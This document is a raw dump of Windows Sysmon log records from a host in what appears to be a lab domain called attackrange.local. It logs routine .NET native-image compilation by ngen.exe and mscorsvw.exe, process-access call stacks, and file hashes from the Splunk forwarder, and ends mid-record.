21:02:45.598{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A175-60D3-0003-00000000CF01}5976C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019708Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:45.582{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A175-60D3-0003-00000000CF01}5976C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019707Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:45.582{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A175-60D3-0003-00000000CF01}5976C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000019706Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:02:45.488{4DB9351A-A174-60D3-FF02-00000000CF01}4564C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\11d4-0\System.Management.dll2021-06-23 21:02:45.488 23542300x800000000000000019705Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:45.426{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FECEC84CA9127174363B578CF8946285,SHA256=96BC3A83EE369F10B8936E04E2B5CEDFC92BD83A0179B34D71DDC16C2291B0E4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019724Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:46.988{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CDEC30854D180C3CF33778F0901C86A3,SHA256=CF7AAD6A5BF97D534BC0B36E83B1609C35BC79A787FB0693EFD050A1F7F9DD91,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019723Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:46.816{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=79C621ECC0DB1EB3B579524B6C14450B,SHA256=D4612FD87A9EAB1F8A663293AD2D98674C16C149F2C6F74F8F7DF13ABA928141,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000019722Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:46.207{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A176-60D3-0303-00000000CF01}6304C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019721Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:46.191{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A176-60D3-0303-00000000CF01}6304C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019720Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:46.191{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A176-60D3-0303-00000000CF01}6304C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 23542300x800000000000000019719Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:45.988{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AAE0C04E1B858D7A97B2BE079834E262,SHA256=66F0630439D4E10C69FFD62EF68353C9274A40D2BD68B8590990C9B4B808DC59,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019739Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:47.941{4DB9351A-A177-60D3-0603-00000000CF01}3032NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\RMMJJSBVRE\System.DirectoryServices.ni.dll.auxMD5=31286E44B261B65582EC519B9203D318,SHA256=8B91498B66C0F3715D475DECC77B6DF189F14806F5E814B6C954B94CB7891F19,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019738Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:47.941{4DB9351A-A177-60D3-0603-00000000CF01}3032NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\RMMJJSBVRE\System.DirectoryServices.ni.dllMD5=9200CABF15C545EAE0645372960FF7A7,SHA256=9A23D5A7D6A5803334B7E91A639E46D8E9DB85AA03559DCB2C7FEB3870699B6B,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000019737Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:02:47.879{4DB9351A-A177-60D3-0603-00000000CF01}3032C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\bd8-0\System.DirectoryServices.dll2021-06-23 21:02:47.879 10341000x800000000000000019736Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:47.363{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A177-60D3-0603-00000000CF01}3032C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019735Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:47.332{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A177-60D3-0603-00000000CF01}3032C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019734Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:47.332{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A177-60D3-0603-00000000CF01}3032C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000019733Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:47.285{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A177-60D3-0503-00000000CF01}5176C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019732Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:47.269{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A177-60D3-0503-00000000CF01}5176C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019731Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:47.269{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A177-60D3-0503-00000000CF01}5176C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000019730Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:47.207{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A177-60D3-0403-00000000CF01}5476C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019729Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:47.192{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A177-60D3-0403-00000000CF01}5476C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019728Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:47.192{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A177-60D3-0403-00000000CF01}5476C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000019727Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:47.098{4DB9351A-A176-60D3-0303-00000000CF01}6304NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\U8SLS5HAUR\Microsoft.VisualBasic.ni.dll.auxMD5=014370C2C340177B4F4B45C6DD281F3E,SHA256=BAD9FC63EA5C80D85009FBA7DDF699175A00466B7AEF1E802281635A6784E2CE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019726Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:47.098{4DB9351A-A176-60D3-0303-00000000CF01}6304NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\U8SLS5HAUR\Microsoft.VisualBasic.ni.dllMD5=F7EB3BD0DF441921AE17140ACFFDD52A,SHA256=2F1B8DFDFA6E5FC41D66F88B9437FF0473BC713278E207DE63D485024731881D,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000019725Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:02:47.051{4DB9351A-A176-60D3-0303-00000000CF01}6304C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\18a0-0\Microsoft.VisualBasic.dll2021-06-23 21:02:47.051 10341000x800000000000000019756Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:48.723{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A178-60D3-0903-00000000CF01}6460C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019755Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:48.707{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A178-60D3-0903-00000000CF01}6460C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019754Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:48.707{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A178-60D3-0903-00000000CF01}6460C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000019753Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:48.644{4DB9351A-A178-60D3-0803-00000000CF01}4784NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\PDSPYAGW31\System.Transactions.ni.dll.auxMD5=41647B6347DDA57E3341211880499114,SHA256=B75F63545EA42F8D312E5603146C43F773C9BD6526786795412BA4030E6C5090,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019752Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:48.644{4DB9351A-A178-60D3-0803-00000000CF01}4784NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\PDSPYAGW31\System.Transactions.ni.dllMD5=3E29FF5CA4A3450636E1196494C42CD5,SHA256=B557336FB30E51EFEFA7FDC886D84A32F0292F83030A52CC7913B8FEDFDC4428,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000019751Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 